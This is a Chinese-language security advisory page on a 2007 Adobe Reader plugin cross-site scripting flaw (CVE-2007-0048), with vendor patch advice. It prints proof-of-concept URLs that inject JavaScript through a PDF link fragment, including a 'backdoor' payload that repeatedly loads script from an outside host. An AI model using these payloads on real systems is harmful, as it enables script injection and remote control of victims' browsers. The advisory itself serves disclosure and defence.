安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Adobe Reader插件Open参数跨站脚本漏洞
发布日期:
2007-01-03
更新日期:
2009-10-26
受影响系统:
Adobe Acrobat 8.x
Adobe Acrobat 7.x
Adobe Reader < 8.0.0
描述:
BUGTRAQ ID:
21858
CVE(CAN) ID:
CVE-2007-0048
,
CVE-2007-0045
,
CVE-2007-0044
Adobe Reader(也被称为Acrobat Reader)是美国Adobe公司开发的一款优秀的PDF文档阅读软件。
Adobe Reader Plugin由于没有正确验证传递到PDF文档的输入,存在跨站漏洞,远程攻击者用特制URL内的FDF、XML、XFDF参数利用此漏洞执行跨站脚本攻击、Web缓存投毒和其他恶意行为。
<*来源:Stefano Di Paola (
stefano@dipaola.wisec.it
)
Giorgio Fedon
链接:
http://xforce.iss.net/xforce/xfdb/31266
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://downloads.securityfocus.com/vulnerabilities/exploits/21858.html
http://www.example.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null);
http://downloads.securityfocus.com/vulnerabilities/exploits/21858-backdoor.html
http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:setInterval(function()
{var s = document.createElement('script');s.src = '
http://www.gnucitizen.org/carnaval/channel';s.defer
= true;s.type = 'text/javascript';document.body.appendChild(s);}, 2000);void(0);
建议:
厂商补丁:
Adobe
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.adobe.com/support/security/
浏览次数:
2111
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客